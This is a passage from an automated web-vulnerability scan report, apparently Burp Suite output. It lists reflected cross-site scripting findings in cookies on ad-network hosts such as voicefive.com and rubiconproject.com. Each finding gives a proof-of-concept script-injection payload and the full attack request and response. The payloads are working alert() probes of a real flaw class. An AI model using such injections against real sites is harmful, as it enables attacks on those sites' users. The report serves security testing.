Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:25 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&14e24<script>alert(1)</script>b86076f8671', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://pho
...[SNIP]...

3.210. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 6bcc7<script>alert(1)</script>7a54d76561f was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&6bcc7<script>alert(1)</script>7a54d76561f; BMX_G=method->-1,ts->1308225881; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=6&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:28 2011&6bcc7<script>alert(1)</script>7a54d76561f=&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&6bcc7<script>alert(1)</script>7a54d76561f', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "BMX_G": 'method->
...[SNIP]...

3.211. http://ar.voicefive.com/bmx3/broker.pli [ar_p97464717 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p97464717 cookie is copied into the HTML document as plain text between tags. The payload a0aa6<script>alert(1)</script>50facb961b6 was submitted in the ar_p97464717 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&a0aa6<script>alert(1)</script>50facb961b6; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->1308225881; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:27 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
Ready.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&a0aa6<script>alert(1)</script>50facb961b6', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14
...[SNIP]...

3.212. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6451/11953/20435-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da0e9"-alert(1)-"ea5c44d4dee was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/6451/11953/20435-15.js?cb=0.631738840136677&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=da0e9"-alert(1)-"ea5c44d4dee; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; ses15=11953^1; csi15=3206204.js^1^1308225202^1308225202; cd=false

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:07:38 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Thu, 16-Jun-2011 13:07:38 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Thu, 16-Jun-2011 13:07:38 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=11953^5; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=71541; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3187871.js^3^1308225219^1308226058&3206204.js^2^1308225202^1308225888; expires=Thu, 23-Jun-2011 12:07:38 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 1928

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3187871"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=da0e9"-alert(1)-"ea5c44d4dee\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.213. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6451/11953/20435-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf1d0"-alert(1)-"c32b88e8fd9 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/6451/11953/20435-2.js?cb=0.8756860857829452&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308226504796&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=cf1d0"-alert(1)-"c32b88e8fd9; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses15=11953^5; csi15=3187871.js^3^1308225219^1308226202&3206204.js^2^1308225202^1308225888; cd=false

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:05:54 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Thu, 16-Jun-2011 14:05:54 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Thu, 16-Jun-2011 14:05:54 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=11953^11; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=68045; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3187870.js^9^1308226504^1308229554&1295153.js^1^1308228373^1308228373&3183300.js^1^1308227126^1308227126; expires=Thu, 23-Jun-2011 13:05:54 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 1918

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3187870"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=cf1d0"-alert(1)-"c32b88e8fd9\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.214. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ed3"><script>alert(1)</script>dfa8b213171 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308237977515&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=40ed3"><script>alert(1)</script>dfa8b213171; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; cd=false; rdk2=0; ses2=11953^37; csi2=2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^43; csi15=1300434.js^1^1308237982^1308237982&2553663.js^11^1308234261^1308237668&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:26:29 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Thu, 16-Jun-2011 16:26:29 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=2; expires=Thu, 16-Jun-2011 16:26:29 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=11953^37; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=59610; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=1300433.js^2^1308237983^1308237989&2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; expires=Thu, 23-Jun-2011 15:26:29 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: text/html
Content-Length: 1834

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=40ed3"><script>alert(1)</script>dfa8b213171" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

3.215. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70eaf"-alert(1)-"26dbdaf9800 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/dk.js?defaulting_ad=x306e40.js&size_id=15&account_id=6451&site_id=11953&size=300x250&cb=0.9354042278137058 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308241078986&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=70eaf"-alert(1)-"26dbdaf9800; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; ses2=11953^42; csi2=1300433.js^6^1308237983^1308240767&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; rdk=6451/11953; rdk15=0; ses15=11953^53; csi15=3173952.js^1^1308241079^1308241079&1300434.js^9^1308237982^1308240770&2553663.js^20^1308234261^1308240767&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:18:18 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Thu, 16-Jun-2011 17:18:18 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=2; expires=Thu, 16-Jun-2011 17:18:18 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=11953^53; expires=Fri, 17-Jun-2011 04:59:59 GMT; max-age=56501; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=1300434.js^11^1308237982^1308241098&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; expires=Thu, 23-Jun-2011 16:18:18 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 1838

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "1300434"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=70eaf"-alert(1)-"26dbdaf9800\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.216. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:35:07 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 18:35:07 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-18-06-44_13548876581308247604ZZZZadvertop100_06-16-2011-18-35-07_17442218741308249307; expires=Tue, 14-Jun-2016 18:35:07 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=advertop100_17442218741308249307; expires=Thu, 16-Jun-2011 18:50:07 GMT; path=/; domain=c3metrics.com
Content-Length: 6698
Content-Type: text/html

